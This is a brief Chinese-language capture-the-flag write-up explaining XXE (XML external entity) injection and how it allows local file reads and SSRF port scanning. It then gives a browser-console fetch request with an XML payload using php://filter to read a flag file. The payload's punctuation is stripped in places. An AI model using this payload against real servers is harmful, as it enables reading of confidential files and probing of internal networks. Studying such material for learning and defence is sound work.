1.外部实体注入 XXE SSRF 内网端口扫描 本地文件读取1XXEXML External Entity外部实体注入XML 支持自定义 DTD 文档类型定义可以通过SYSTEM关键字声明外部实体让服务器去读取本地文件、发起内网 / 外网 HTTP 请求。 如果后端使用了未禁用外部实体的 XML 解析库就会触发 XXE 漏洞攻击者可以1.读取服务器任意本地文件/etc/passwd、login.php源码等2.结合 SSRF 对内网进行端口扫描、访问内网隐藏服务2.查看网页源代码3.打开 F12 查看页面源码发现登录点击事件绑定doLogin()JS 函数控制台 fetch 请求代码fetch(login.php, { method: POST, headers: { Content-Type: application/xml;charsetutf-8 }, body: ?xml version1.0 encodingUTF-8? !DOCTYPE user [ !ENTITY flag SYSTEM php://filter/readconvert.base64-encode/resource/flag ] user usernameflag;/username password123/password /user }) .then(resres.text()) .then(dataconsole.log(响应结果,data))4.使用cybechef进行解码5.输入flag